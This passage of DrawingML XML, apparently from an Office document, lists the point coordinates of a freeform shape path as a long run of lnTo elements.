                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1922" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1908" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1896" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1884" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1882" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1871" y="317"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1865" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1858" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1851" y="323"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1848" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1845" y="332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1847" y="334"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1851" y="334"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1859" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1858" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1857" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1859" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1858" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1848" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1844" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1841" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1837" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1832" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1832" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1833" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1831" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1828" y="386"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1826" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1824" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1810" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1801" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1796" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1790" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1776" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1770" y="379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1762" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1753" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1747" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1745" y="353"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1743" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1739" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1731" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1725" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1720" y="407"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1715" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1706" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1693" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1684" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1678" y="355"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1674" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1667" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1662" y="335"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1657" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1650" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1643" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1641" y="328"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1643" y="323"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1660" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1674" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1676" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1680" y="292"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1679" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1676" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1667" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1657" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1647" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1635" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1629" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1620" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1615" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1611" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1598" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1598" y="266"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1599" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1600" y="280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1590" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1580" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1571" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1553" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1546" y="296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1541" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1535" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1520" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1518" y="280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1520" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1511" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1505" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1491" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1475" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1464" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1452" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1442" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1438" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1438" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1437" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1433" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1425" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1419" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1413" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1409" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1405" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1400" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1394" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1390" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1388" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1388" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1392" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1393" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1385" y="265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1379" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1366" y="275"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1351" y="282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1342" y="282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1330" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1324" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1316" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1311" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1325" y="276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1342" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1359" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1365" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1386" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1411" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1419" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1426" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1443" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1437" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1435" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1444" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1441" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1435" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1430" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1426" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1418" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1408" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1394" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1385" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1380" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1367" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1358" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1350" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1349" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1343" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1329" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1331" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1339" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1342" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1341" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1326" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1315" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1301" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1298" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1303" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1314" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1313" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1307" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1296" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1289" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1281" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1265" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1254" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1245" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1244" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1249" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1240" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1233" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1227" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1223" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1224" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1223" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1218" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1213" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1206" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1200" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1190" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1181" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1174" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1163" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1166" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1163" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1155" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1143" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1136" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1125" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1110" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1094" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1082" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1069" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1065" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1063" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1057" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1035" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1028" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1020" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1018" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1018" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1020" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1027" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1029" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1032" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1030" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1023" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1019" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1007" y="265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1010" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1017" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1013" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1003" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="995" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="989" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="986" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="983" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="973" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="957" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="939" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="923" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="919" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="917" y="266"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="917" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="923" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="923" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="923" y="312"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="925" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="935" y="324"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="942" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="946" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="948" y="340"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="955" y="345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="960" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="966" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="961" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="960" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="965" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="966" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="967" y="412"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="968" y="418"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="963" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="958" y="428"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="958" y="412"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="954" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="952" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="949" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="944" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="942" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="943" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="945" y="382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="949" y="377"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="955" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="954" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="949" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="936" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="932" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="923" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="915" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="905" y="333"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="897" y="328"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="888" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="882" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="879" y="333"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="880" y="350"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="874" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="866" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="863" y="348"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="853" y="349"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="851" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="856" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="860" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="866" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="880" y="374"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="884" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="887" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="882" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="879" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="874" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="862" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="851" y="386"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="841" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="837" y="377"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="835" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="834" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="835" y="348"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="839" y="334"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="841" y="321"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="840" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="837" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="832" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="831" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="831" y="321"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="830" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="829" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="824" y="349"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="817" y="355"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="808" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="802" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="803" y="374"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="810" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="817" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="818" y="413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="816" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="811" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="809" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="813" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="813" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="819" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="829" y="481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="833" y="479"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="840" y="476"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="849" y="479"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="855" y="481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="862" y="486"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="868" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="872" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="875" y="508"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="876" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="878" y="517"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="877" y="522"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="870" y="529"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="870" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="873" y="538"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="877" y="538"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="883" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="886" y="544"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="885" y="550"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="879" y="553"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="870" y="552"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="863" y="548"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="861" y="543"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="864" y="523"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="863" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="857" y="499"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="851" y="495"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="839" y="495"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="829" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="824" y="501"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="822" y="503"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="821" y="514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="825" y="524"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="827" y="534"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="826" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="820" y="553"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="814" y="559"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="811" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="810" y="575"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="801" y="584"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="791" y="590"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="789" y="596"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="786" y="602"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="779" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="771" y="600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="766" y="601"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="758" y="600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="747" y="596"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="742" y="592"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="738" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="736" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="741" y="580"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="747" y="579"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="753" y="581"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="764" y="587"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="772" y="583"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="775" y="581"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="773" y="571"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="777" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="781" y="563"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="790" y="551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="796" y="543"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="798" y="537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="801" y="521"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="804" y="512"/>
                    </a:lnTo>
                    <a:lnTo>
